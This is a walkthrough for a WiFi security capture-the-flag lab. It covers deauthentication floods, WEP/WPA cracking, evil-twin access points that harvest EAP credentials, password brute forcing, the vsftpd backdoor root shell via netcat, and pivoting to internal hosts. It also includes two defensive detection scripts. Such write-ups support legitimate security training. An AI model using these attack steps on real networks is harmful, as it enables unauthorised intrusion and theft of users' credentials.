WIFI Hacking Walkthrough-2100

The document provides details about a WiFi security Capture the Flag challenge involving 10 flags hidden in various WiFi networks. Players are given monitor mode access to three WiFi cards on a Kali Linux machine and must use WiFi hacking tools like airodump-ng, aircrack-ng, and aireplay-ng to find the flags by cracking network passwords, intercepting traffic, and exploring open networks and web interfaces. Techniques include capturing handshakes, cracking WEP keys, generating honeypot access points, and decrypting packets to retrieve the 10 hidden flags.

Uploaded by Michael Maigwa

Name WiFi Security CTF: [Nov 13-18]

URL https://attackdefense.com/challengedetails?cid=2100

Type Weekly CTF : All

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

WiFi networks have become ubiquitous. The joy of staying connected without wires has pushed
the industry to improve the throughput of WiFi networks to give wired networks tough
competition. Hence, understanding WiFi security and being able to audit a WiFi network is a
critical skill all security professionals should possess.

We have used our emulated WiFi labs to create an environment with different kinds of WiFi
networks and clients. The player will be provided CLI access to a Kali Linux machine with three
monitor mode capable WiFi cards. We have hidden ten flags in the environment.

Flag description

● FLAG1 is BSSID of the home network of a person who works for Aegis Consulting. Hint:
Look for a client with MAC 02:00:00:00:08:00.
● FLAG2 is present on a WiFi access point's HTTP interface
● FLAG3 is the WEP key for a WiFi network operating in the vicinity.
● FLAG4: A WiFi client is looking for a WPA-PSK network. This network's SSID is one of
the 100 most popular SSIDs. FLAG4 is the secret passphrase for this network.
● Flag 5 is being transmitted in data packets of a very funnily named WPA2-PSK network.
The SSID name is based on a very famous fiction movie series. The secret passphrase
of this network is: FLAG4 | queen | XXX where X is a number from 0-9 and | is the
concatenation symbol.
● FLAG6: A WiFi client is looking for an EAP-PAP network. This network's SSID is one of
the 100 most popular SSIDs. FLAG6 is the password saved by the device for this
network.
● Flag 7 is hosted on a webserver of Zora Corporation. However, be aware Zora
Corporation has mandated very strong passwords for WiFi access.
● Flag 8 is hosted on an FTP of ABCorp. The SSID name of ABCorp is CorporateNetwork.
● Flag 9 is hosted on a webserver of ABCorp.
● Flag 10 is stored in a Memcached server of ZenithCorporation. The client trying to
connect to this network has the wrong credential pair. But, the password it is using, is
correct for one of the most common usernames on enterprise WiFi networks.

Objective: Get all 10 Flags!

Solution:

The description of flags is provided in the challenge description. Use that as starting point.

FLAG1 is the BSSID of the home network of an employee of Aegis Consulting.

Step 1: Look around at the devices in the vicinity and locate the client probing for the "AegisConsulting"
network.

Command: airodump-ng wlan0

A client with MAC 02:00:00:00:08:00 is looking for the AegisConsulting SSID.

Step 2: Check the WiFi spectrum to see whether this client is connected to some other network. On
sniffing traffic on channel 44, you will find that this same client is connected to the Darthnet SSID.

Command: airodump-ng wlan0 -c 44

The BSSID of this network is 68:7F:77:C2:C2:9A

FLAG1: 68:7F:77:C2:C2:9A

NOTE: The AegisConsulting probe is only visible for some time. Once the device connects to
Darthnet, the probe is no longer visible; after that the player will have to deauth this client. It is
deliberately kept this way.

Launch a deauth attack on all BSSIDs one by one.

Deauth Command: aireplay-ng -0 100 -a 68:7F:77:C2:C2:9A wlan0

On deauthing the correct BSSID, the AegisConsulting probe request will appear.

In this case, there was no way to know which BSSID to deauth, so the player is expected to use
trial and error on all BSSIDs, i.e. deauth each BSSID and check whether the probe request appears.
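The deauthentication flood used above (aireplay-ng -0) is the same signal a wireless IDS keys on: an AP legitimately sends a handful of deauthentication frames per session, while a flood delivers dozens within a second, spoofed with the AP's own address. The script below is an added example for the defender's side, not part of the original walkthrough. It takes management-frame summaries as (timestamp, subtype, source MAC, BSSID) tuples (a constructed input format; a real deployment would fill them from a capture) and raises an alert when a sliding-window count of deauthentication frames for one source/BSSID pair crosses a threshold. The sample frames reuse the Darthnet BSSID from this flag and are constructed; the window and threshold values are assumptions to tune per site.

```python
"""Detect a deauthentication flood in a stream of 802.11 management-frame records.

Added example (not part of the original walkthrough). Each record is a constructed
tuple (timestamp_seconds, frame_subtype, source_mac, bssid). In IEEE 802.11,
management frames with subtype 12 are deauthentication frames.
"""
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12      # 802.11 management frame subtype 0xC = Deauthentication
BEACON_SUBTYPE = 8       # subtype 0x8 = Beacon (used only to build the sample)
WINDOW_SECONDS = 1.0     # sliding window length (assumed tuning value)
THRESHOLD = 20           # deauth frames per source per window treated as a flood (assumed)


def detect_deauth_floods(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return a list of (source_mac, bssid, window_start, count) alerts.

    One alert is raised per (source, bssid) pair the first time its sliding-window
    count reaches the threshold; later frames of the same burst do not re-alert.
    Spoofed deauth frames carry the AP's address as source, so the pair is keyed on
    both fields and MACs are lower-cased to make comparison case-insensitive.
    """
    windows = defaultdict(deque)   # (src, bssid) -> timestamps inside the current window
    alerted = set()
    alerts = []
    for ts, subtype, src, bssid in sorted(frames, key=lambda f: f[0]):
        if subtype != DEAUTH_SUBTYPE:
            continue
        key = (src.lower(), bssid.lower())
        q = windows[key]
        q.append(ts)
        while q and ts - q[0] > window:    # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((key[0], key[1], q[0], len(q)))
    return alerts


# Constructed sample: beacons every 102.4 ms, two benign deauths spread over a
# minute, then 100 deauths in 1.5 s, which is roughly what "aireplay-ng -0 100" emits.
AP = "68:7F:77:C2:C2:9A"
SAMPLE_FRAMES = (
    [(t * 0.1024, BEACON_SUBTYPE, AP, AP) for t in range(600)]
    + [(5.0, DEAUTH_SUBTYPE, AP, AP), (40.0, DEAUTH_SUBTYPE, AP, AP)]
    + [(50.0 + i * 0.015, DEAUTH_SUBTYPE, AP, AP) for i in range(100)]
)

if __name__ == "__main__":
    for src, bssid, start, n in detect_deauth_floods(SAMPLE_FRAMES):
        print("deauth flood: %d frames from %s (BSSID %s) within %.1fs starting at t=%.2f"
              % (n, src, bssid, WINDOW_SECONDS, start))
```

On the sample this reports one alert for the Darthnet BSSID starting at t=50.0 with 20 frames; the two isolated deauthentications never reach the threshold. The trade-off is the usual one: a lower threshold catches shorter bursts but will also fire on a busy AP that legitimately evicts many stations at once, so the values should be set from a baseline of the monitored network.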

 
FLAG2 is present on a WiFi access point's HTTP interface.

There are multiple open SSIDs in the environment. One of those is "AngelNet". Connect to it.
Again, as it is a CTF, the player is expected to look around, especially in all the open networks, to
find the flag.

Step 1:​ Change the state of interface wlan1 to up (i.e. active).

Command:​ ifconfig wlan1 up


Step 2:​ Connect to the network using wlan1 interface

Command:​ iwconfig wlan1 essid AngelNet

Step 3:​ Check the status of the wlan1 interface

Command:​ iw dev

Step 4:​ To get IP layer connectivity, we will need an IP address. Run dhclient to get an IP
address for wlan1.

Command:​ dhclient -v wlan1


Step 5:​ Scan the gateway with nmap.

Command:​ nmap 172.19.0.1

Step 6:​ A webserver is operating on the interface. Check the content being served by it.

Command:​ curl 172.19.0.1


The flag is present in this content.

FLAG2:​ e0878efca2a95a9d4459a29cd22c648f

FLAG3 is the WEP key for a WiFi network operating in the vicinity.

Step 1:​ Look for the WEP networks using airodump-ng.

Command: ​airodump-ng wlan0

Step 2: We can observe a WEP network with the "ElectricWorks" SSID. It is also transmitting data
packets on channel 6. Run airodump-ng in traffic capture mode on channel 6.

Command: airodump-ng wlan0 -c 6 -w wep

Step 3: To crack the WEP key, aircrack-ng will need a lot of packets. Open a new tab and use
aireplay-ng to generate packets. We will need the BSSID of the WEP network, B8:0D:F8:D5:89:F9,
and the connected client MAC, B2:55:A6:34:3D:23, for this.

Command: aireplay-ng -3 -b B8:0D:F8:D5:89:F9 -h B2:55:A6:34:3D:23 wlan0

NOTE: It is important that the ARP request count goes up too. For more details, check the WEP
cracking theory in the PA courses.

Step 4: Once we have enough packets (say more than 50,000), stop airodump-ng and
aireplay-ng.
Afterwards, launch aircrack-ng on the .cap file generated by airodump-ng.

Command: aircrack-ng wep-01.cap

Step 5: Select the index number of our WEP network.

Aircrack-ng will then go ahead and crack the key.

The WEP key of this network is 54123.

FLAG 3: 54123

FLAG4: A WiFi client is looking for a WPA-PSK network. This network's SSID is one of
the 100 most popular SSIDs. FLAG4 is the secret passphrase for this network.

Step 1: Create a sample hostapd config file for a WPA2-PSK network and save it as hostapd.conf

Hostapd config
interface=wlan2
ssid=XXXXXX
wpa=1
wpa_passphrase=dummypassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=TKIP CCMP
channel=6

Step 2: Create a bash script named "create_aps.sh" to read the SSIDs from the list and
generate configs

#!/bin/bash
# Bring up a hostapd AP for each SSID in the list, 30 seconds each, so that a
# client probing for one of these names gets a chance to associate.
ssid_list="/root/wordlists/100-most-popular-ssid.txt"

while IFS= read -r line
do
    echo "Trying : $line"
    # Substitute the XXXXXX placeholder in the template with the current SSID
    sed "s/XXXXXX/$line/g" hostapd.conf > hostapd.conf.1
    timeout 30 hostapd hostapd.conf.1
done < "$ssid_list"

Step 3: Make this script executable and run it

Commands:
chmod +x create_aps.sh
./create_aps.sh

The script will create APs for each SSID one by one and wait 30 seconds for a client to connect.

Step 4:​ Now one can either use visual inspection of logs or automate the client connection
detection.

Here, by visual inspection we can see that the SSID “Home” got a client connection.
Hence, the SSID is “Home”.

Step 5: ​Create a hostapd configuration file for the WPA-PSK network with SSID “Home” and
name it hostapd.conf. The passphrase can be anything.

Configuration
interface=wlan2
ssid=Home
bssid=b8:0d:f7:83:79:b0
wpa=1
wpa_passphrase=chocolate123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=TKIP CCMP
channel=6

Step 6: ​Run hostapd with this configuration.

Command:​ hostapd -i wlan2 hostapd.conf


Step 7: Now we need to wait for the client to connect. To capture the handshake, we will use
airodump-ng on channel 6. Open a new tab and run airodump-ng.

Command: airodump-ng -c 6 wlan0 -w cap

The client device will connect to this honeypot and the handshake will be captured.
Check the output in the hostapd tab to confirm that a client tried to connect to the honeypot.

Step 8: Stop airodump-ng and hostapd. Run aircrack-ng with 100-common-passwords.txt, present in the
wordlists/ directory, as the wordlist.

Command: aircrack-ng -w wordlists/100-common-passwords.txt cap-01.cap

Select the index of ‘Home’ ESSID.

aircrack-ng will start cracking the password.


The WPA-PSK passphrase is friendship.

FLAG 4: friendship

FLAG 5 is being transmitted in data packets of a very funnily named WPA2-PSK network.
The SSID name is based on a very famous fiction movie series.

As per the hint, target Lord-of-the-Pings SSID as that is funny and the name is derived from
Lord of the Rings movie series.

Step 1: ​Run airodump-ng in capture mode on channel 1.

Command:​ airodump-ng -c 1 wlan0 -w packet --essid Lord-of-the-Pings


Step 2: ​The client is already connected to Lord-of-the-Pings SSID. In order to capture the
handshake, launch a deauth attack to disconnect the client. Open a new tab and run
aireplay-ng.

Command:​ aireplay-ng -0 100 -a B8:0D:F7:6E:79:5A wlan0

Now the handshake will be captured by the airodump-ng and will be saved in packet-01.cap file.

Command:​ ls -l

We know that the WPA-PSK passphrase is: FLAG4 | queen | XXX


FLAG4 is friendship, so the known part of passphrase will be: friendshipqueen

Step 3: Now, to generate all possible passphrases, we will use a python script.

Python script

# generate.py: emit every candidate "friendshipqueen" + XXX, where XXX is a
# three-digit number 000-999 (zero-padded, as the flag description specifies XXX)
for x in range(1000):
    print("friendshipqueen{:03d}".format(x))

Step 4: ​Run this python script to generate the wordlist

Command:​ python generate.py > wordlist.txt

Step 5: ​Use this wordlist with aircrack-ng to crack the network

Command:​ aircrack-ng -w wordlist.txt packet-01.cap

The correct WPA-PSK Passphrase: friendshipqueen153

Step 6: ​There are data packets in the capture. Decrypt the traffic for Lord-of-the-Pings network.

Command:​ airdecap-ng -e Lord-of-the-Pings -p friendshipqueen153 packet-01.cap


The decrypted packets will be present in packet-01-dec.cap file

Step 7: ​Check the decrypted packets with tcpdump.

Command:​ tcpdump -r packet-01-dec.cap

Step 8: ​The UDP port rplay unreachable packet seems interesting. Check payloads of the
packets too.

Command:​ tcpdump -nnvvXSs 1514 -r packet-01-dec.cap


The flag is present in the payload.

FLAG 5: 888d2543a15a04805ef26ac062ea127f

FLAG6: A WiFi client is looking for an EAP-PAP network. This network's SSID is one of
the 100 most popular SSIDs. FLAG6 is the password saved by the device for this
network.

Step 1:​ Write the hostapd-mana configuration for the target network and name it hostapd.conf

hostapd-mana Configuration
interface=wlan1
ssid=XXXXXX
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1

Also, create a hostapd.eap_user file.

EAP user file content


* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Step 2: Create a bash script named "create_aps.sh" to read the SSIDs from the list and
generate configs

#!/bin/bash
# Same loop as for FLAG4, but launching hostapd-mana (the EAP honeypot) for each SSID
ssid_list="/root/wordlists/100-most-popular-ssid.txt"

while IFS= read -r line
do
    echo "Trying : $line"
    # Substitute the XXXXXX placeholder in the template with the current SSID
    sed "s/XXXXXX/$line/g" hostapd.conf > hostapd.conf.1
    timeout 30 hostapd-mana hostapd.conf.1
done < "$ssid_list"

Step 3: Make this script executable and run it

Commands:
chmod +x create_aps.sh
./create_aps.sh

The script will create APs for each SSID one by one and wait 30 seconds for a client to connect.

Step 4: Now one can either use visual inspection of the logs or automate the client connection
detection.

Here, by visual inspection, we can see that the EAP-PAP SSID "eduram" got a client
connection. The credentials are also visible:

eap-ttls/pap:
username: joshua
password: accessgoliath1

The flag is the password for the EAP-PAP network, i.e. accessgoliath1

FLAG 6: accessgoliath1

FLAG 7 is hosted on a webserver of Zora Corporation. However, be aware Zora
Corporation has mandated very strong passwords for WiFi access.

Step 1: ​Check the output of airodump-ng to find out the ENC, CIPHER, and AUTH used by
ZoraCorp.

Command:​ airodump-ng wlan0 -c 11

Step 2: ​Write the hostapd-mana configuration for the target network and name it
hostapd-mana.conf

hostapd-mana Configuration
interface=wlan1
ssid=ZoraCorp
channel=11
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1
enable_sycophant=1
sycophant_dir=/tmp/

Also, create a hostapd.eap_user file.

EAP user file content


* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Step 3: Start hostapd-mana with the configuration files created above (the honeypot interface,
wlan1, is set in hostapd-mana.conf).

Command: hostapd-mana hostapd-mana.conf


The next step is to write the configuration for wpa_sycophant. Open a new tab and change
directory to /root/wpa_sycophant/. Afterwards, save the configuration below as
wpa_sycophant_example.conf .

WPA Sycophant Configuration

network={
ssid="ZoraCorp"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Don't want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=02:00:00:00:01:00
}

Note: Please make sure to put the BSSID of the hostapd-mana based honeypot in the
configuration file. This is to make sure that sycophant doesn't connect to the honeypot.

Step 4: Start wpa_sycophant with the above configuration on interface wlan2 (while inside
the wpa_sycophant/ directory)

Command: ./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan2

The setup is ready. Now, force the client to connect to the hostapd-mana honeypot.

Step 5: A deauthentication flood can be used to push the client to the honeypot. Open a new tab
and run aireplay-ng.

Command:​ aireplay-ng -0 100 -a E2:E9:6A:D4:B3:51 -c A2:EF:A1:A5:80:75 wlan0

Within a few seconds, the client will connect to the honeypot and logs will appear on both the
hostapd-mana and the wpa_sycophant consoles.

The client connects to hostapd-mana honeypot.

Hostapd-mana console logs

Here one can observe the username ‘boris’. Hostapd-mana coordinates with wpa_sycophant to
perform a successful MITM.

WPA Sycophant console logs


From wpa_sycophant’s logs, one can tell that the connection is successful and the interface
wlan2 is connected to the target network.

NOTE: ​It might not work on the first try. Please try 2-3 times before contacting the support.

Step 6: ​The same can be verified by checking the interface status on a new tab. (OR Stop
aireplay-ng and run the commands on that same tab)

Command:​ iw dev

WPA_sycophant script also starts dhclient on the interface. So, check the IP address of the
interface.

Command:​ ifconfig wlan2


The interface now has IP 172.25.0.215 and it looks like the WiFi router is at 172.25.0.1

Step 7: ​Scan the WiFi router with Nmap

Command:​ nmap 172.25.0.1

Step 8: ​SSH, DNS and HTTP servers are running on it.

Check the hosted content on the webserver running on the WiFi router.

Command: ​curl 172.25.0.1

The HTTP content tells us that the LAN interface of the router has the IP address 192.228.221.3.
Please note that it will be different each time.

Step 9: Run an Nmap scan on the next IP of this range (i.e. 192.228.221.4). As only
TCP/UDP traffic is allowed, use an Nmap TCP Connect scan.

Command: nmap -sT 192.228.221.4

Step 10: ​HTTP server is operating on the machine. Check the content hosted on it.

Command:​ curl 192.228.221.4

Step 11: ​The response came empty. Check header information.


Command:​ curl -I 192.228.221.4

Step 12: The webserver content is protected by Basic authentication. Launch hydra to perform
a dictionary attack on it.

Command: hydra -L wordlists/top-usernames.txt -P wordlists/100-common-passwords.txt 192.228.221.4 http-get /

Step 13: hydra has found the credentials. Use them to retrieve the information.

Command: curl -u webmaster:juliana 192.228.221.4

FLAG 7: aede53584e6e524d1cd9c531e3572150

FLAG 8 is hosted on an FTP of ABCorp. The SSID name of ABCorp is CorporateNetwork.

Step 1: ​The CorporateNetwork SSID is operating on channel 6.

Command:​ airodump-ng wlan0 -c 6


Step 2: ​To steal the credentials, let’s start a honeypot.

Command:
cd eaphammer/
./eaphammer -i wlan2 --channel 6 --auth wpa-eap --essid CorporateNetwork --creds

Step 3: Launch a deauth attack to disconnect the client connected to the target network (i.e.
CorporateNetwork). For this, run aireplay-ng from a separate tab.

Command:​ aireplay-ng -0 100 -a E2:E9:6A:D3:B3:50 -c F2:ED:21:A4:89:A5 wlan0

The client will connect to the honeypot and we will get the username and password hash. Stop
aireplay-ng and eaphammer.

In order to crack the hash, copy the jtr hash line from the output and save it in a new file named
“hash”. (We have changed our directory to /root/ before saving this file.)

Note: Using echo to save the hash might put an incorrect hash in the file. Use of a text editor like
nano or vim is advised.

Step 4: Run jtr to crack the hash

Command: john --wordlist=wordlists/100-common-passwords.txt hash

We have the password now.

Credentials
Username: molly
Password: trustno1

We also know that it is a PEAP-MSCHAPv2 network. So, create a wpa_supplicant configuration
and name it supplicant.conf

network={
ssid="CorporateNetwork"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="molly"
password="trustno1"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}

Step 5: Run wpa_supplicant with this configuration file.

Command:​ wpa_supplicant -B -Dnl80211 -iwlan1 -c supplicant.conf

Step 6: ​Check the status of the interface wlan1

Command: iw dev

Step 7: Run dhclient to get an IP address on the interface.

Command: dhclient -v wlan1

Step 8: The IP address 172.22.0.181 is assigned to the interface and the gateway is
172.22.0.1. Let's scan the gateway machine.

Command:​ nmap 172.22.0.1


Step 9: ​The gateway is running an HTTP server. Check the content hosted on it.

Command:​ curl 172.22.0.1

Step 10: The IP of the router is 192.109.83.3. Scan the next machine in this series,
i.e. 192.109.83.4.

Command:​ nmap -sT 192.109.83.4

Step 11: ​The target is running an FTP and SSH service. Run service fingerprinting on the
target.

Command:​ nmap -sT -sV 192.109.83.4


The vsftpd version running on the target is known to contain a backdoor. Connect to it and
provide the username a:) and a blank password.

Command: ftp 192.109.83.4

Username: a:) Password: <blank>

Step 12: ​The control will get stuck after entering the details. The VSFTPD has opened a
listening service on 6200. Open another terminal tab and connect to that with netcat.

Command:​ nc 192.109.83.4 6200

Once connected, check /root for flag.txt

The flag is stored in /root/flag.txt

FLAG 8: 58c7c29a8ab5e7c4c06256b954947f9a

FLAG 9 is hosted on a webserver of ABCorp.

Step 1: While interacting with the nc session opened for the last flag, check whether the
compromised machine has additional network interfaces.

Command: ifconfig

Step 2: ​We can observe an additional interface eth1. Try to ping the next IP in that network
range.

Command: ​ping -c 1 192.172.114.3

The ping is successful. So the machine is up. Now to get stable access to the compromised
machine, instead of this netcat based connection, let’s use SSH connection.

Step 3: ​SSH is already running on this machine, check if root login is permitted on this machine.

Command: ​cat /etc/ssh/sshd_config | grep -i root


Step 4: ​The root login is permitted, so we only need to change the root password to be able to
SSH into this machine.

Command: ​passwd root

Set password: welcome

Step 5: Close the nc session and SSH into this machine (the FTP server, 192.109.83.4).

Command: ssh root@192.109.83.4

Username: root Password: welcome

Login was successful.

Step 6: curl and nmap are not present on this machine, so copy them from the attacker Kali
machine. Open a new tab for copying the files.

Command: scp portable-tools/curl portable-tools/nmap root@192.109.83.4:/bin/


Step 7: ​Use nmap from FTP server machine to scan the other machine.

Command: ​nmap 192.172.114.3

Step 8: ​Check the content hosted on HTTP server running on the second target.

Command: ​curl 192.172.114.3

Step 9: ​It is protected by authentication. Check the headers.

Command: ​curl -I 192.172.114.3


Digest authentication is used to protect this directory.

Step 10: Transfer the dictionaries from the Kali machine to this machine.

Command: scp wordlists/top-usernames.txt wordlists/100-common-passwords.txt root@192.109.83.4:/root/

Step 11: On the compromised FTP server machine, write a bash script that uses curl to carry out a
dictionary attack. vim can be used as the editor.

Step 12: ​Change permissions and run the script.

Command:
chmod +x brute.sh
./brute.sh 192.172.114.3 top-usernames.txt 100-common-passwords.txt

We found the credentials.


Username: admin Password: cookie1

Step 13: ​Use the credentials to access the content.

Command:​ curl -c cookie --digest -u admin:cookie1 192.172.114.3

The flag is hosted on the webpage.

FLAG 9: 11ac49c9cb5a8a763d8990de844da253

FLAG 10 is stored in a memcached server of ZenithCorporation. The client trying to
connect to this network has the wrong credential pair. But, the password it is using is
correct for one of the most common usernames on enterprise WiFi networks.

Step 1: ​A client is looking for ZenithCo. Create a honeypot for SSID ZenithCo using
eaphammer.

Command:
cd eaphammer
./eaphammer -i wlan2 --channel 6 --auth wpa-eap --essid ZenithCo --creds

Wait for the client to connect. The client will connect and we will be able to see the credentials.

Now as per the challenge description, the username is wrong but the password is correct for
one of the popular usernames.

Step 2: There are multiple ways to do this.

Option 1: A python/bash script can be used to create configurations with different identities (i.e.
usernames).

Option 2: The EAP Spray option of eaphammer can also be used.

On trying different usernames, the player will notice that "guest" is the correct username for this
password.

Take “guest” as the username and create a wpa_supplicant configuration for this network and
name it supplicant.conf

network={
ssid="ZenithCo"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="guest"
password="mamba123"
phase1="peaplabel=0"
phase2="auth=GTC"
}
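Both supplicant configurations on this page (the CorporateNetwork block for FLAG 8 and the ZenithCo block just above) connect to a WPA-EAP network without a ca_cert or a domain_match setting, which is exactly the client behaviour that lets hostapd-mana and eaphammer harvest credentials: the client accepts any server certificate, builds the TLS tunnel to the rogue AP and then sends the inner authentication. The script below is an added example from the defender's side and is not part of the walkthrough. It parses wpa_supplicant network={...} blocks and flags EAP blocks that lack CA pinning, server-name matching, or that use an inner method (PAP, GTC) which carries the password in clear inside the tunnel. The hardened block in the sample, its CA file path and RADIUS server name are assumptions; wpa_supplicant's ca_cert, ca_path, domain_match, domain_suffix_match, subject_match and altsubject_match keys are real settings.

```python
"""Audit wpa_supplicant network blocks for EAP server-certificate validation.

Added example (not the walkthrough's own code). Finds WPA-EAP blocks that would
accept a rogue authenticator's certificate or send the password in clear inside
the TLS tunnel.
"""
import re

# wpa_supplicant settings that pin the authenticator's certificate or name
CA_KEYS = ("ca_cert", "ca_path")
NAME_KEYS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")
CLEARTEXT_INNER = ("auth=PAP", "auth=GTC")   # inner methods that carry the password in clear


def parse_network_blocks(text):
    """Return one dict (key -> value, quotes stripped) per network={...} block."""
    blocks = []
    for body in re.findall(r"network\s*=\s*\{(.*?)\}", text, re.S):
        settings = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()       # drop comments and blank lines
            if "=" not in line:
                continue
            key, value = line.split("=", 1)            # split on the first '=' only:
            settings[key.strip()] = value.strip().strip('"')   # phase2="auth=..." keeps its '='
        blocks.append(settings)
    return blocks


def audit_block(settings):
    """Return the list of findings for one block (empty list means nothing to flag)."""
    findings = []
    if "WPA-EAP" not in settings.get("key_mgmt", ""):
        return findings        # PSK / open networks: certificate checks do not apply
    if not any(k in settings for k in CA_KEYS):
        findings.append("no ca_cert/ca_path: any server certificate is accepted")
    if not any(k in settings for k in NAME_KEYS):
        findings.append("no domain_match/domain_suffix_match: a certificate for any name is accepted")
    inner = settings.get("phase2", "")
    if any(m in inner for m in CLEARTEXT_INNER):
        findings.append("inner method sends the password in clear inside the tunnel (%s)" % inner)
    return findings


def audit(text):
    """Map each block's SSID to its findings."""
    return {b.get("ssid", "?"): audit_block(b) for b in parse_network_blocks(text)}


# Constructed sample: the CorporateNetwork block as written on this page, followed by
# a hardened variant (the ca_cert path and domain_match value are assumptions).
SAMPLE_CONF = '''
network={
    ssid="CorporateNetwork"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="molly"
    password="trustno1"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="CorporateNetwork-hardened"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="molly"
    password="trustno1"
    # assumed CA bundle of the corporate RADIUS server
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    # assumed RADIUS server name; the rogue AP's certificate will not carry it
    domain_match="radius.abcorp.example"
    phase2="auth=MSCHAPV2"
}
'''

if __name__ == "__main__":
    for ssid, findings in audit(SAMPLE_CONF).items():
        print(ssid, "->", findings or ["ok"])
```

Run as-is, the first block gets two findings and the hardened block none. Applied to the ZenithCo block above, the checker adds a third finding for phase2="auth=GTC", which is why eaphammer can show that password in plaintext rather than as an MSCHAPv2 challenge/response that still needs cracking.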

Step 3: ​Run the wpa_supplicant with this config.

Command:​ wpa_supplicant -B -Dnl80211 -iwlan1 -c supplicant.conf


Step 4: ​Check the status of the interface in a few seconds.

Command:​ iw dev

Step 5: ​The interface is connected to the network. Get an IP address on the interface by using
dhclient.

Command: ​dhclient -v wlan1


Step 6: ​As before, check the content of the webserver running on the gateway machine.

Command: ​curl 172.30.0.1

The LAN side IP address of the router is 192.23.115.3.

Step 7: ​Scan the next machine on this range i.e. 192.23.115.4

Command:​ nmap -sT 192.23.115.4

Step 8: An HTTP server is running on the machine. Check the content.

Command: curl 192.23.115.4

Step 9: ​It seems like an API to interact with memcached. Interact with it. List all Memcached
keys.

Command: ​curl 192.23.115.4/list

Step 10: ​Observe that there is an item with the key FLAG10. Retrieve this item.

Command:​ curl 192.23.115.4/get?key=FLAG10

The value of key FLAG10 is the flag.

FLAG 10: 4870fd644137e40694d76d8220bb184b
